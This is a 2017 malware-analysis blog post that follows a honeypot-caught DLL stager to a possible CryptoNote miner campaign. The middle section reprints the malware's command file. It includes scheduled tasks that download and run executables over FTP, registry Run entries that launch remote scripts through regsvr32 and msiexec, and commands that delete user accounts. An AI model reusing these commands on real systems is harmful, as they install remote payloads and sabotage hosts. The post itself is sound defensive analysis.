Saturday, October 7, 2017

Malware Analysis: CryptoNote Miner? , part 1

Once again I was poking around the binaries that my honeypot collected and I found a really interesting DLL. Mainly because there was no obfuscation at all. This has been a fun one to analyze.

So again, the first thing I noticed was the complete lack of obfuscation. Not even packed with UPX or a simple XOR. 

I uploaded it to Virustotal:


Pretty high detection rate. Looks like it was first uploaded back in May of 2017.

Doing some initial static analysis in IDA, I realized this is just a simple stager. The graph view in IDA really shows how simple it is:


At loc_100029E:


This function seems to be the main purpose of this stager. Notice the offset aVarToff3000Var that gets pushed to the stack. Looks promising!




Well what do you know, looks like some Javascript. Among other things, this Javascript reaches out to few different locations to retrieve some additional crap to dump on your computer.

http://wmi.oo000oo.club:8888/kill.html
http://wmi.oo000oo.club:8888/test.html
http://js.oo000oo.club:280/v.sct (this returned a 404)

So naturally I decided to see if I could get my hands on these. 


So using curl, I found that kill.html seems to be instructions for killing several different processes, a kill switch of sorts. The one I found th most interesting was:

NsCpuCNMiner64.exe c:\windows\debug\wk\NsCpuCNMiner64.exe 0

It doesn't take a whole lot of imagination to figure out what this is. A brief google search lead me to  a github repository:

https://github.com/nanopool/Claymore-XMR-CPU-Miner



So looks like we might have a CryptoNote Miner on our hands! 

Lets try http://wmi.oo000oo.club:8888/test.html



Ok... another URL... Lets try to download it:


A .rar file. I wonder whats inside...



Nothing? But its 1.9 MB. This led me to believe this is not an actual .rar file. So I opened it in CFF explorer to check it out.



Hey! This has the wrong magic number for a .rar file. A .rar should have a magic number of 52 61 72 21 1A 07 00 [Rar!...], this has 4D 5A [MZ] which means this is actually an .exe.

Opening this up in IDA reveals that this file is heavily obfuscated. It will take me a bit to de-obfuscate it. I will get back to this soon.

I decided to keep digging through the original binary to see if I could find anymore hints. I found one more URL:

http://down.oo000oo.club:8888/ok.txt


Looks like some taskkills, registry adds and a few other things:



[down]
http://209.58.186.145:8888/close.bat C:\windows\debug\c.bat 0
[cmd]

net1 start schedule&net1 user asps.xnet /del

net1 user IISUSER_ACCOUNTXX /del&net1 user IUSR_ADMIN /del&net1 user snt0454 /del&taskkill /f /im Logo1_.exe&del c:\windows\Logo1_.exe&taskkill /f /im Update64.exe&del c:\windows\dell\Update64.exe

taskkill /f /im misiai.exe&del misiai.exe&del c:\windows\RichDllt.dll&net1 user asp.net /del&taskkill /f /im winhost.exe&del c:\windows\winhost.exe&del c:\windows\updat.exe

taskkill /f /im netcore.exe&del c:\windows\netcore.exe&taskkill /f /im ygwmgo.exe&del c:\windows\ygwmgo.exe&net1 user aspnet /del&net1 user LOCAL_USER /del

schtasks /create /tn "Mysa" /tr "cmd /c echo open down.mysking.info>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe>>s&echo bye>>s&ftp -s:s&a.exe" /ru "system"  /sc onstart /F

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "start" /d "regsvr32 /u /s /i:http://js.mykings.top:280/v.sct scrobj.dll" /f

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "start1" /d "msiexec.exe /i http://js.mykings.top:280/helloworld.msi /q" /f



Look at that, more URLs. The mykings.top domain seems to be taken down or moved. However, the URL http://209.58.186.145:8888/close.bat works.


Lets see what this batch file has to offer.


Lets see... so it makes some firewall changes and blocks all SMB traffic, shuts down some processes, and adds two scheduled tasks, one of which I found particularly interesting:

schtasks /create /tn "Mysa2" /tr "cmd /c echo open ftp.oo000oo.me>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p" /ru "system"  /sc onstart /F 

This connects to ftp.oo000oo.me and logs in with a username and password of test:1433. Sweet password guys. 



This was also an executable disguised as a .rar and is also heavily obfuscated. The techniques used to obfuscate this one are very similar the 32b executable I downloaded earlier. If I can figure one of these out, the other should be fairly simple. 

In the second part of this write up, I will hopefully de-obfuscate these binaries and get a better idea of what this mess is up to. I'm thinking that one of these binaries is going to be the CryptoNote mining software. I guess we will find out!

EDIT: Turns out that these binaries are protected with VMProtect 3.x. I don't think I will be able to unpack these with my current skill set.

Thursday, October 5, 2017